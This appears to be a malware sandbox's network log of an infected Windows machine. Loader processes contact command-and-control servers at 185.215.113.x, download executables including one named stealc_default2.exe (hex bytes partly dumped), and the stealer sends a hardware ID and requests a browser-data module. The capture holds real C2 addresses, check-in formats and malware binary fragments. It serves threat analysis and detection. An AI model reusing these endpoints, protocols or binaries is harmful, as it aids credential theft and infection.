Sep 27, 2024 04:21:06.705082893 CEST	1236	IN	Data Raw: c0 0d 08 40 b3 50 71 2f a3 d3 5c 62 af 05 d5 89 d3 24 56 f3 9b 58 1a 9f 65 41 53 9f 8c e5 31 17 48 3e 60 0f c3 f8 5e 3d 9f e8 42 a4 85 e2 87 a9 46 c9 bd 86 8a b0 bf 56 fc 7c d9 6d 39 01 d1 21 c8 ea a3 41 87 67 e5 47 de 6f 70 86 66 9c 11 f1 d7 8a Data Ascii: @Pq/\b$VXeAS1H>`^=BFV\|m9!AgGopfo5`{qBL#hI)A7%~L2&AB)3nc>y$P3xhH'wZ';rlLefOSAI;tHb^,YZfi9Go,
Sep 27, 2024 04:21:06.705144882 CEST	1236	IN	Data Raw: 6f 9f 71 c2 f8 74 66 d3 f3 ec 94 5f 87 89 56 52 03 77 ab d0 2a c2 f6 1d 7c 79 0e 5d da de 30 8a c8 da ca 78 58 03 b3 64 3a 23 9e 1a 8d e8 0e 92 94 59 a5 e5 be 2d c6 cc be 23 61 df df 61 9b 53 48 7e 80 9e 31 f0 ba 54 37 58 f7 8d 05 ec 90 00 36 46 Data Ascii: oqtf_VRw*\|y]0xXd:#Y-#aaSH~1T7X6F?<r?jjOLp}HYr-`i5)5W1`Lj"?x/!av2m\|M}=4l,>/^K[qS.7vAW&#Zo\
Sep 27, 2024 04:21:06.709805012 CEST	1236	IN	Data Raw: ff 65 c3 8c 07 07 b0 60 61 67 39 d3 88 68 24 81 97 6e 30 d9 7b 2b d5 99 a9 85 fb 34 b1 7c 87 af 3e 32 01 41 b5 b0 59 29 60 cf bd da ac 6c 3e e1 01 ea af d4 a2 95 3d 9a c5 0d e1 b3 d4 71 2f d1 8b f5 5f bc 1e 52 d9 31 41 64 a9 17 9f 8d a2 2f bc 95 Data Ascii: e`ag9h$n0{+4\|>2AY)`l>=q/_R1Ad/N-j?vKJ"YR1Ov-;jUZ3}eO>mA-e\|DC.,T#/)V)vaxfCOzjM)J9Ji^B3kNX"JW8DgRkgPwH

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.5	49715	185.215.113.16	80	5632	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 04:21:08.276566982 CEST	184	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 31 Cache-Control: no-cache Data Raw: 64 31 3d 31 30 30 30 30 30 34 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000004001&unit=246122658369
Sep 27, 2024 04:21:08.998712063 CEST	193	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 02:21:08 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 4 <c>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.5	49716	185.215.113.26	80	5632	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 04:21:09.264225006 CEST	50	OUT	GET /Nework.exe HTTP/1.1 Host: 185.215.113.26
Sep 27, 2024 04:21:09.983994007 CEST	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 02:21:09 GMT Content-Type: application/x-msdos-program Content-Length: 425984 Connection: keep-alive Last-Modified: Sat, 24 Aug 2024 17:17:20 GMT ETag: "68000-620711078a800" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 cc 13 50 4a 88 72 3e 19 88 72 3e 19 88 72 3e 19 d3 1a 3d 18 86 72 3e 19 d3 1a 3b 18 28 72 3e 19 5d 1f 3a 18 9a 72 3e 19 5d 1f 3d 18 9e 72 3e 19 5d 1f 3b 18 fd 72 3e 19 d3 1a 3a 18 9c 72 3e 19 d3 1a 3f 18 9b 72 3e 19 88 72 3f 19 5e 72 3e 19 13 1c 37 18 89 72 3e 19 13 1c c1 19 89 72 3e 19 13 1c 3c 18 89 72 3e 19 52 69 63 68 88 72 3e 19 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 a0 15 ca 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 e6 04 00 00 ca 01 00 00 00 00 00 45 d7 01 00 00 10 00 00 00 00 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 f0 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PJr>r>r>=r>;(r>]:r>]=r>];r>:r>?r>r?^r>7r>r><r>Richr>PELfE@@D<L8@.text `.rdata8@@.data\|f 4@.rsrc0@@.reloc<LN2@B
Sep 27, 2024 04:21:09.984013081 CEST	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 68 60 c0 44 00 e8 a5 c4 01 00 59 c3 cc cc cc cc 68 00 c0 Data Ascii: h`DYhDYj h`E<,FnhDtYj hE$2Fnh DTYjhE2FnhD4Yj hE\-FnhDYjhE1Fonh@
Sep 27, 2024 04:21:09.984025955 CEST	1236	IN	Data Raw: 00 e8 14 c0 01 00 59 c3 cc cc cc 6a 04 68 6c 85 45 00 b9 b4 2f 46 00 e8 6f 6a 01 00 68 40 ce 44 00 e8 f4 bf 01 00 59 c3 cc cc cc 6a 04 68 74 85 45 00 b9 f0 34 46 00 e8 4f 6a 01 00 68 a0 ce 44 00 e8 d4 bf 01 00 59 c3 cc cc cc 6a 04 68 7c 85 45 00 Data Ascii: YjhlE/Fojh@DYjhtE4FOjhDYjh\|E41F/jhDYjhE5Fjh`DYjhE2FihDtYjhEFih DTYjhEFihD4YjhE
Sep 27, 2024 04:21:09.984039068 CEST	672	IN	Data Raw: 36 46 00 e8 af 65 01 00 68 80 dc 44 00 e8 34 bb 01 00 59 c3 cc cc cc 6a 14 68 50 87 45 00 b9 7c 34 46 00 e8 8f 65 01 00 68 e0 dc 44 00 e8 14 bb 01 00 59 c3 cc cc cc 6a 10 68 68 87 45 00 b9 2c 2a 46 00 e8 6f 65 01 00 68 40 dd 44 00 e8 f4 ba 01 00 Data Ascii: 6FehD4YjhPE\|4FehDYjhhE,*Foeh@DYjh\|ED-FOehDYjhE</F/ehDYjhE,Feh`DYjhE.FdhDtYjhED0Fdh DTY
Sep 27, 2024 04:21:09.984050035 CEST	1236	IN	Data Raw: 29 46 00 e8 0f 63 01 00 68 60 e4 44 00 e8 94 b8 01 00 59 c3 cc cc cc 6a 50 68 70 89 45 00 b9 b0 35 46 00 e8 ef 62 01 00 68 c0 e4 44 00 e8 74 b8 01 00 59 c3 cc cc cc 6a 10 68 c4 89 45 00 b9 74 2a 46 00 e8 cf 62 01 00 68 20 e5 44 00 e8 54 b8 01 00 Data Ascii: )Fch`DYjPhpE5FbhDtYjhEt*Fbh DTYj4hE4FbhD4YjhE4.FbhDYjPh El,Fobh@DYj@hxE6FObhDYjhE3F/bhDY
Sep 27, 2024 04:21:09.984070063 CEST	1236	IN	Data Raw: d8 53 46 00 e8 c1 9a 01 00 c7 04 24 76 f4 44 00 e8 bd b3 01 00 59 c3 6a 02 68 a4 53 46 00 e8 eb a3 01 00 68 82 f4 44 00 e8 a5 b3 01 00 83 c4 0c c3 68 8e f4 44 00 e8 97 b3 01 00 59 c3 b9 d4 53 46 00 e8 38 a4 01 00 68 ec f4 44 00 e8 81 b3 01 00 59 Data Ascii: SF$vDYjhSFhDhDYSF8hDYUF"hDkYhD_YjiYZF,[Fh8[FEUVuu3^]uQI^]W}twVWQ3_^]h
Sep 27, 2024 04:21:09.984081984 CEST	1236	IN	Data Raw: 04 00 cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 8b 45 08 89 01 8b 45 0c 89 41 04 8b c1 5d c2 08 00 cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 8b 45 08 8b 55 0c 89 10 89 48 04 5d c2 08 00 cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec Data Ascii: UEEA]UEUH]UUVuRPuHVI;Ju;u^]2^]UAVuV;Bu;Eu^]2^]SUkl$jh@DdPSX F3EVW
Sep 27, 2024 04:21:09.984095097 CEST	1236	IN	Data Raw: 08 01 56 8b f1 74 0b 6a 08 56 e8 30 aa 01 00 83 c4 08 8b c6 5e 5d c2 04 00 cc cc 68 f4 85 46 00 68 20 92 41 00 68 e8 85 46 00 e8 8b 92 01 00 83 c4 0c 85 c0 0f 84 5c 40 03 00 b8 f4 85 46 00 c3 cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 8b 45 08 85 Data Ascii: VtjV0^]hFh AhF\@FUEu]PU F3EVEENEQEWEPfME3^]UjhDdP F3EVPEd
Sep 27, 2024 04:21:09.984107018 CEST	1236	IN	Data Raw: 50 08 b9 03 00 00 00 8b c6 f0 0f b1 0b 3b c6 0f 45 f0 83 fe 02 75 46 8d 77 34 56 e8 93 95 01 00 83 c4 04 85 c0 75 6a c6 47 64 01 56 c7 45 fc 02 00 00 00 e8 a0 95 01 00 83 c4 04 85 c0 75 58 8d 47 0c c7 45 fc 03 00 00 00 50 e8 c3 8b 01 00 83 c4 04 Data Ascii: P;EuFw4VujGdVEuXGEPuGEOHuPMdY_^[]PPPPPUjh`DdP F3ESVWPEd}sVEu:
Sep 27, 2024 04:21:09.984118938 CEST	552	IN	Data Raw: c7 06 94 05 45 00 66 0f d6 00 8b 45 08 83 c0 04 50 e8 c9 02 03 00 83 c4 08 c7 06 f0 17 45 00 8b c6 5e 5d c2 04 00 cc cc cc cc cc cc cc cc cc cc cc cc cc 56 8b f1 8b 46 04 85 c0 74 41 8b 4e 0c 2b c8 83 e1 fc 81 f9 00 10 00 00 72 12 8b 50 fc 83 c1 Data Ascii: EfEPE^]VFtAN+rP#+w#QP1FFF^6Ujh8DdPV F3PEduuEN$t<PN$t;PRF$j(V
Sep 27, 2024 04:21:09.988920927 CEST	1236	IN	Data Raw: 0f 13 45 e8 e8 42 f6 ff ff 8b 70 04 85 f6 74 07 f0 ff 46 04 8b 70 04 8b 08 89 4d e8 89 75 ec c7 45 fc 03 00 00 00 57 68 c0 34 40 00 85 c9 74 06 8b 01 ff 10 eb 0f 8d 4d e4 c7 45 e4 c0 8e 45 00 e8 26 f5 ff ff 85 f6 74 21 83 cf ff 8b c7 f0 0f c1 46 Data Ascii: EBptFpMuEWh4@tMEE&t!Fu~OuPMdY_^[M3z]UjhDdP F3PEdzMdY]UjhDdPV F3

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.5	49720	185.215.113.16	80	5632	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 04:21:11.607685089 CEST	184	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 31 Cache-Control: no-cache Data Raw: 64 31 3d 31 30 30 30 30 30 35 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000005001&unit=246122658369
Sep 27, 2024 04:21:12.438265085 CEST	193	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 02:21:12 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 4 <c>0
Sep 27, 2024 04:21:12.440484047 CEST	63	OUT	GET /inc/stealc_default2.exe HTTP/1.1 Host: 185.215.113.16
Sep 27, 2024 04:21:12.657468081 CEST	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 02:21:12 GMT Content-Type: application/octet-stream Content-Length: 192000 Last-Modified: Sat, 24 Aug 2024 14:58:01 GMT Connection: keep-alive ETag: "66c9f4f9-2ee00" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a2 62 9b e5 e6 03 f5 b6 e6 03 f5 b6 e6 03 f5 b6 89 75 5e b6 fe 03 f5 b6 89 75 6b b6 eb 03 f5 b6 89 75 5f b6 dc 03 f5 b6 ef 7b 76 b6 e5 03 f5 b6 66 7a f4 b7 e4 03 f5 b6 ef 7b 66 b6 e1 03 f5 b6 e6 03 f4 b6 8d 03 f5 b6 89 75 5a b6 f4 03 f5 b6 89 75 68 b6 e7 03 f5 b6 52 69 63 68 e6 03 f5 b6 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 98 e0 c8 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 c8 01 00 00 42 22 00 00 00 00 00 90 64 01 00 00 10 00 00 00 e0 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 30 24 00 00 04 00 00 00 00 00 00 02 00 40 81 00 00 10 00 00 10 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$bu^uku_{vfz{fuZuhRichPELfB"d@0$@<#$.textJ .rdata@@.data+!@.reloc*D#F@B
Sep 27, 2024 04:21:12.657555103 CEST	224	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 79 b9 41 00 70 c8 41 00 d9 c8 41 00 00 00 00 Data Ascii: yApAAUQEE}tMUUEEE]UEExMUMMM]UQSjh
Sep 27, 2024 04:21:12.657565117 CEST	1236	IN	Data Raw: 30 00 00 68 c0 41 c8 17 6a 00 ff 15 24 d0 62 00 89 45 fc 50 83 f8 11 74 05 8b c0 fc 85 c9 0b c0 f8 58 83 7d fc 00 74 2c 90 8a c0 68 c0 9e e6 05 8b 45 fc 50 e8 4e 73 01 00 53 8a c9 8a c9 fc 5b 68 00 80 00 00 68 c0 41 c8 17 8b 4d fc 51 ff 15 64 cf Data Ascii: 0hAj$bEPtX}t,hEPNsS[hhAMQdb[]UQEjj@h0hjbPbE}ujbR]U(EPtbMM}sjb]U@bPa
Sep 27, 2024 04:21:12.657577038 CEST	1236	IN	Data Raw: 30 e8 4d 8c 01 00 8b 4d fc e8 e5 00 00 00 8b e5 5d c3 cc 55 8b ec 51 89 4d fc 8b 45 08 50 8b 4d fc e8 0d 01 00 00 8b 4d 08 83 c1 30 51 8b 4d fc 83 c1 30 e8 bb 8b 01 00 8b 55 08 83 c2 3c 52 8b 4d fc 83 c1 3c e8 a9 8b 01 00 8b 45 08 83 c0 48 50 8b Data Ascii: 0MM]UQMEPMM0QM0U<RM<EHPMHMUBTATMUBXAXMUB\A\MUB`A`MUBdAdMUBhAhMUBlAlMUBpApMUBtAtMUBxAxM\|QM\|E]
Sep 27, 2024 04:21:12.657591105 CEST	1236	IN	Data Raw: c8 e8 29 89 01 00 8b c8 e8 92 88 01 00 8b c8 e8 1b 89 01 00 8b c8 e8 14 89 01 00 8b c8 e8 0d 89 01 00 8b c8 e8 76 88 01 00 50 8d 8d 94 fe ff ff e8 ea 87 01 00 8d 8d 6c fd ff ff e8 3f 87 01 00 8d 8d 78 fd ff ff e8 34 87 01 00 8d 8d 84 fd ff ff e8 Data Ascii: )vPl?x4)R0PhTUB<QURHPhTBTQUR`PZLEP)
Sep 27, 2024 04:21:12.657603979 CEST	1236	IN	Data Raw: 45 fc 6b c0 2c 03 85 90 00 00 00 83 ec 0c 8b cc 50 e8 35 82 01 00 8b 4d fc 6b c9 2c 8b 95 90 00 00 00 8b 44 0a 0c 50 8b 4d fc 6b c9 2c 8b 95 90 00 00 00 8d 44 0a 10 83 ec 0c 8b cc 50 e8 09 82 01 00 e8 a4 f7 ff ff 81 c4 b4 00 00 00 e9 58 ff ff ff Data Ascii: Ek,P5Mk,DPMk,DPXURM]UEbbUbPbAbBb]U}t#E8tMQ;U\|EEH
Sep 27, 2024 04:21:12.657618046 CEST	1236	IN	Data Raw: 83 c4 0c a3 3c cb 62 00 6a 0b 68 74 1c 42 00 68 80 1c 42 00 e8 fe 21 00 00 83 c4 0c a3 a0 cd 62 00 6a 0d 68 8c 1c 42 00 68 9c 1c 42 00 e8 e5 21 00 00 83 c4 0c a3 48 cd 62 00 6a 0c 68 ac 1c 42 00 68 bc 1c 42 00 e8 cc 21 00 00 83 c4 0c a3 bc cb 62 Data Ascii: <bjhtBhB!bjhBhB!HbjhBhB!bjhBhB!bjhBhB!bjhBhB!bjh$Bh4Bh!bjhDBhXBO!$bjhlBhxB6!bjhBh
Sep 27, 2024 04:21:12.657645941 CEST	552	IN	Data Raw: 00 6a 0a 68 0c 21 42 00 68 18 21 42 00 e8 31 1d 00 00 83 c4 0c a3 d8 c9 62 00 6a 18 68 24 21 42 00 68 40 21 42 00 e8 18 1d 00 00 83 c4 0c a3 90 cb 62 00 6a 0e 68 5c 21 42 00 68 6c 21 42 00 e8 ff 1c 00 00 83 c4 0c a3 4c c9 62 00 6a 0d 68 7c 21 42 Data Ascii: jh!Bh!B1bjh$!Bh@!Bbjh\!Bhl!BLbjh\|!Bh!Bbjh!Bh!Bbjh!Bh!B$bjh!Bh!Bbjh"Bh"Bbjh4"BhL"Bibjhd"Bh\|"BP
Sep 27, 2024 04:21:12.657660961 CEST	1236	IN	Data Raw: 0e 68 1c 24 42 00 68 2c 24 42 00 e8 0b 1b 00 00 83 c4 0c a3 4c cc 62 00 6a 09 68 3c 24 42 00 68 48 24 42 00 e8 f2 1a 00 00 83 c4 0c a3 e0 cc 62 00 6a 0b 68 54 24 42 00 68 60 24 42 00 e8 d9 1a 00 00 83 c4 0c a3 4c cd 62 00 6a 0e 68 6c 24 42 00 68 Data Ascii: h$Bh,$BLbjh<$BhH$BbjhT$Bh`$BLbjhl$Bh\|$Bhbjh$Bh$B\bjh$Bh$Bbj h$Bh$Bubjh%Bh%B\ bjh,%Bh8%BChbjhD%BhX%B*
Sep 27, 2024 04:21:12.657674074 CEST	1236	IN	Data Raw: e8 42 16 00 00 83 c4 0c a3 10 cd 62 00 6a 05 68 1c 2b 42 00 68 24 2b 42 00 e8 29 16 00 00 83 c4 0c a3 30 cd 62 00 6a 0b 68 2c 2b 42 00 68 38 2b 42 00 e8 10 16 00 00 83 c4 0c a3 48 cb 62 00 6a 09 68 44 2b 42 00 68 50 2b 42 00 e8 f7 15 00 00 83 c4 Data Ascii: Bbjh+Bh$+B)0bjh,+Bh8+BHbjhD+BhP+Bbjh\+Bhp+B`bjh+Bh+Bbjh+Bh+B,bjh+Bh+Bbjh+Bh+Bzxbjh,Bh,Babjh,,
Sep 27, 2024 04:21:12.657685041 CEST	448	IN	Data Raw: 62 00 6a 0f 68 ac 31 42 00 68 bc 31 42 00 e8 60 11 00 00 83 c4 0c a3 10 cb 62 00 6a 0f 68 cc 31 42 00 68 dc 31 42 00 e8 47 11 00 00 83 c4 0c a3 a4 cc 62 00 6a 3d 68 ec 31 42 00 68 2c 32 42 00 e8 2e 11 00 00 83 c4 0c a3 34 c9 62 00 6a 09 68 6c 32 Data Ascii: bjh1Bh1B`bjh1Bh1BGbj=h1Bh,2B.4bjhl2Bhx2B\|bjh2Bh2B$bjh2Bh2B\bjh2Bh2Bbjh2Bh2Bbjh2Bh2BPbjh2Bh2B

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.5	49721	185.215.113.26	80	7040	C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 04:21:13.094140053 CEST	155	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.26 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 27, 2024 04:21:13.800390959 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 02:21:13 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 27, 2024 04:21:13.801392078 CEST	309	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.26 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 41 43 42 32 32 30 37 32 34 39 42 38 43 43 38 32 43 30 34 38 46 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 32 34 45 43 41 46 46 31 36 41 37 44 43 45 41 46 34 41 37 38 30 33 38 43 39 30 39 31 35 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7ACB2207249B8CC82C048FBD66259586F0F21EA74869AC58983B524ECAFF16A7DCEAF4A78038C90915021C0784D71D9D043121CCF65D78857C
Sep 27, 2024 04:21:14.032385111 CEST	314	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 02:21:13 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 36 35 0d 0a 20 3c 63 3e 31 30 30 30 30 36 35 30 30 31 2b 2b 2b 61 36 64 33 39 31 37 62 63 63 31 62 38 61 34 30 31 32 36 39 66 36 39 66 38 63 38 36 65 62 66 30 66 34 37 61 31 37 37 62 37 62 64 35 32 35 30 62 37 62 39 63 38 36 39 66 33 62 31 31 63 63 62 64 36 37 37 36 63 31 39 37 62 37 61 64 35 37 61 33 23 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 65 <c>1000065001+++a6d3917bcc1b8a401269f69f8c86ebf0f47a177b7bd5250b7b9c869f3b11ccbd6776c197b7ad57a3#<d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.5	49722	185.215.113.17	80	528	C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 04:21:13.448975086 CEST	89	OUT	GET / HTTP/1.1 Host: 185.215.113.17 Connection: Keep-Alive Cache-Control: no-cache
Sep 27, 2024 04:21:14.167699099 CEST	203	IN	HTTP/1.1 200 OK Date: Fri, 27 Sep 2024 02:21:14 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Sep 27, 2024 04:21:14.179357052 CEST	416	OUT	POST /2fb6c2cc8dce150a.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----HJECAAKKFHCFIECAAAKE Host: 185.215.113.17 Content-Length: 215 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 48 4a 45 43 41 41 4b 4b 46 48 43 46 49 45 43 41 41 41 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 46 39 45 32 46 37 32 32 41 39 35 31 31 31 37 33 38 38 33 36 35 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 45 43 41 41 4b 4b 46 48 43 46 49 45 43 41 41 41 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 65 66 61 75 6c 74 32 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 45 43 41 41 4b 4b 46 48 43 46 49 45 43 41 41 41 4b 45 2d 2d 0d 0a Data Ascii: ------HJECAAKKFHCFIECAAAKEContent-Disposition: form-data; name="hwid"EF9E2F722A951117388365------HJECAAKKFHCFIECAAAKEContent-Disposition: form-data; name="build"default2------HJECAAKKFHCFIECAAAKE--
Sep 27, 2024 04:21:15.281759977 CEST	407	IN	HTTP/1.1 200 OK Date: Fri, 27 Sep 2024 02:21:14 GMT Server: Apache/2.4.41 (Ubuntu) Vary: Accept-Encoding Content-Length: 180 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 4e 44 63 79 4e 32 4d 78 4d 47 52 6b 4f 47 55 30 4f 54 46 6d 4f 44 67 30 4d 47 46 69 59 32 46 6c 5a 57 59 31 59 54 41 78 4f 47 55 31 59 6a 59 30 4f 57 4a 6b 5a 44 4e 69 59 6a 4e 6c 5a 6a 4e 6a 4d 47 51 33 4d 32 51 35 4d 6a 4d 78 4d 54 4a 6d 4e 32 4a 6b 4d 6a 55 79 4d 6a 4e 6a 59 57 51 33 66 48 64 72 61 32 70 78 59 57 6c 68 65 47 74 6f 59 6e 78 7a 62 57 70 73 62 47 31 35 62 57 78 69 65 6e 45 75 63 48 64 6b 66 44 42 38 4d 48 77 78 66 44 46 38 4d 58 77 78 66 44 46 38 4d 58 77 77 66 48 6c 69 62 6d 4e 69 61 48 6c 73 5a 58 42 74 5a 58 77 3d Data Ascii: NDcyN2MxMGRkOGU0OTFmODg0MGFiY2FlZWY1YTAxOGU1YjY0OWJkZDNiYjNlZjNjMGQ3M2Q5MjMxMTJmN2JkMjUyMjNjYWQ3fHdra2pxYWlheGtoYnxzbWpsbG15bWxienEucHdkfDB8MHwxfDF8MXwxfDF8MXwwfHlibmNiaHlsZXBtZXw=
Sep 27, 2024 04:21:15.283607006 CEST	469	OUT	POST /2fb6c2cc8dce150a.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----AFHDAKJKFCFBGCBGDHCB Host: 185.215.113.17 Content-Length: 268 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 41 46 48 44 41 4b 4a 4b 46 43 46 42 47 43 42 47 44 48 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 34 37 32 37 63 31 30 64 64 38 65 34 39 31 66 38 38 34 30 61 62 63 61 65 65 66 35 61 30 31 38 65 35 62 36 34 39 62 64 64 33 62 62 33 65 66 33 63 30 64 37 33 64 39 32 33 31 31 32 66 37 62 64 32 35 32 32 33 63 61 64 37 0d 0a 2d 2d 2d 2d 2d 2d 41 46 48 44 41 4b 4a 4b 46 43 46 42 47 43 42 47 44 48 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 41 46 48 44 41 4b 4a 4b 46 43 46 42 47 43 42 47 44 48 43 42 2d 2d 0d 0a Data Ascii: ------AFHDAKJKFCFBGCBGDHCBContent-Disposition: form-data; name="token"4727c10dd8e491f8840abcaeef5a018e5b649bdd3bb3ef3c0d73d923112f7bd25223cad7------AFHDAKJKFCFBGCBGDHCBContent-Disposition: form-data; name="message"browsers------AFHDAKJKFCFBGCBGDHCB--
